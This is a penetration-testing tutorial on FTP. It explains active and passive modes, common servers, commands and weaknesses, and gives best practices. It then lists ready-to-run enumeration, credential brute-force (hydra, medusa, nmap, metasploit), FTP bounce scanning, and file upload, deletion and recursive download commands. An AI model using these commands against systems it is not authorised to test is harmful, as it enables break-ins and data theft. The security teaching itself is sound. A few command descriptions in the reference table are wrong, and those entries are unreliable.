Pentesting File Transfer Protocol (FTP)

FTP (File Transfer Protocol) is used to communicate and transfer files between computers. Typically FTP service runs on unsecured TCP port 21 or secured TCP port 990. The client and server establish a control channel through TCP port 21 and data channel via TCP port 20. Depending on the configuration, FTP may use only TCP port 21 or both TCP port 20 and TCP port 21. FTP has active and passive connection modes.

In a non-firewalled client environment communication can happen in an active mode. The client connects from a random unprivileged port (N > 1024) to the FTP server’s port 21. Then, the client starts listening on port (M > 1024) and sends the FTP command PORT M to the FTP server. The server will then initiate a connection back to the client’s specified data port M from its local data port 20. See FTP Active Connection Mode Communication traffic flow.

1
2
3
4
5
6
7
8
9
# on terminal one
sudo tcpdump -Uni $INTERFACE tcp port 21 or port 990    # unbuffered FTP capture filter

# on terminal two
ftp -n    # activate the ftp client utility inhibiting auto-login
ftp> open $IP    # connect to the FTP server
ftp> user $USERNAME $PASSWORD    # submit the username and password
ftp> ls    # list the contents of the working directory
ftp> quit    # quit the connection

/images/ftp/00_ftp-active-connection.png — FTP Active Connection Mode Communication

In a firewalled client environment a passive mode is used. The client initiates connection to the FTP server’s port 21 from a random unprivileged port (N > 1024) and issue the FTP command PASV. The result of this is that the server then opens a random unprivileged port (P > 1024) and sends the FTP command PORT P back to the client. The client then initiates the connection from port (M > 1024) to port P on the server to transfer data. See FTP Passive Connection Mode Communication traffic flow.

1
2
3
4
5
6
7
8
9
# on terminal one
sudo tcpdump -Uni $INTERFACE tcp port 21 or port 990    # unbuffered FTP capture filter

# on terminal two
ftp -np    # activate the ftp client in passive mode inhibiting auto-login
ftp> open $IP    # connect to the FTP server
ftp> user $USERNAME $PASSWORD    # submit the username and password
ftp> ls    # list the contents of the working directory
ftp> quit    # quit the connection

/images/ftp//00_ftp-passive-connection.png — FTP Passive Connection Mode Communication

It is important to note that while observing the traffic on the wire we may only see the control port traffic due to how the FTP server was configured.

Common FTP Server Application

Unix systems
- vsftpd (Very Secure FTP Daemon)
- ProFTPD
- Pure-FTPd
Windows systems
- Core FTP Server
- IIS (Internet Information Services)
- FileZilla Server

Common FTP Commands

COMMAND	USAGE	DESCRIPTION
ABOR	ABOR	abort a file transfer
CWD	CWD $FOLDERNAME	change working directory
DELE	DELE $FILENAME	delete a remote file
HELP	HELP `command`	show commands supported/details
LIST	LIST $FOLDERNAME	list of remote directory
MKD	CWD $FOLDERNAME	make a remote directory
PASS	PASS $PASSWORD	send password
PASV	PASV	send password
PORT	PORT a1,a2,a3,a4,p1,p2	open a data port where address a1.a2.a3.a4, port ((p1 x 256) + p2)
PWD	PWD	print working directory
QUIT	QUIT	terminate the connection
RETR	RETR $FILENAME	retrieve a remote file
RMD	RMD $FOLDERNAME	remove a remote directory
RNFR/RNTO	RNFR $OLD_FILENAME RNTO $NEW_FILENAME	rename a file
STOR	STOR $FILENAME	store a file on the remote host
TYPE	TYPE $DATATYPE	set transfer type
USER	USERNAME $USERNAME	send username

Common Vulnerability

Path Traversal: CWE-37
Information Disclosure: CWE-200 CWE - 220 CWE-319
Improper Access Control: CWE-284

Known Attack Vectors

Security Best Practices

Deploy the FTPS secure implementation, preferably SFTP which runs via SSH protocol.
Enable authentication with a strong password policy.
Enable file access control policy.
Disable application version fingerprint.
Configure CIDR/IP range whitelist if necessary.

Exploitation
Almost all FTP implementations do not have ability to execute a shell command directly but are great for information disclosure, file upload and exfiltration. An attacker’s inclination when an FTP service is encountered can include:

What valuable information they can find including hidden contents.
Whether they can perform path traversal to reach other valuable contents.
Whether they can upload a malicious file and execute it through another service.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
'WORDLISTS
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
'
## SERVICE ENUMERATION ##
# with nmap
ls /usr/share/nmap/scripts/ftp*    # list nmap ftp scripts
'SNIP
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-libopie.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
'
nmap -p 21 -sV $IP   # show version
nmap -p 21 --script ftp-anon $IP    # identify anonymous login
nmap --script ftp-bounce -Pn -b $USERNAME:$PASSWORD@$IP:$PORT -p$TARGETPORTS $TARGETIP -oN nmap_internal_scan    # initiate internal scan

# with telnet 
telnet $IP $PORT     # show banner

# with nc
nc -n $IP 21    # show banner

# with openssl
openssl s_client -connect $IP:21 -starttls ftp    # show banner and certificate

# with metasploit
search scanner/ftp
use auxiliary/scanner/ftp/ftp_version    # show version
show options
setg rhosts $IP
run

use auxiliary/scanner/ftp/anonymous    # identify anonymous login
show options
run

## CREDENTIAL ENUMERATION ##
# with nmap
nmap --script ftp-brute -p 21 $IP --script-args brute.mode=creds,brute.credfile=$USERNAMEPASSWORDLIST --min-rate 10000  # reveal credentials - wordlist entries must be in the form USERNAME/PASSWORD

# with hydra
hydra -t 20 -c 1 -L $USERNAMELIST -P $PASSWORDLIST -s 21 ftp://$IP -V    # reveal credentials

# with medusa
medusa -t 2 -T 2 -U $USERNAMELIST -P $PASSWORDLIST -h $IP -n 21 -M ftp | grep "SUCCESS"

# with metasploit
use auxiliary/scanner/ftp/ftp_login
show options
set threads 30
set rhosts $IP
set userpass_file $USERNAMEPASSWORDLIST    # wordlist in the form USERNAME PASSWORD
run

## PATH ENUMERATION ##
# with curl
curl -s ftp://$USERNAME:$PASSWORD@$IP    # login and list home folder contents
curl -s --user "$USERNAME:$PASSWORD" ftp://$IP:$PORT/ --upload-file $LOCAL_FILENAME     # upload file
curl -s ftp://$USERNAME:$PASSWORD@$IP/ --quote "DELE $REMOTE_FILENAME"    # delete specified file using ftp command

# with wget
wget -r -m --no-passive -nH -P $FOLDERNAME ftp://$USERNAME:$PASSWORD@$IP:$PORT/    # download recursively

## HOST ENUMERATION/FOOTPRINTING ##
# with ftp
ftp -n <<RUN
open $IP
user $USERNAME $PASSWORD
put $LOCAL_FILENAME
RUN

# with lftp
lftp -u '$USERNAME,$PASSWORD' -p21 $IP -c 'ls -a'    # login and list all contents
lftp    # activate the prompt
?    # show help
set ftp:ssl-force yes    # enable ssl
set ssl:verify-certificate no    # do not verify certificate
connect $IP    # connect to the server
login $USERNAME $PASSWORD    # login

References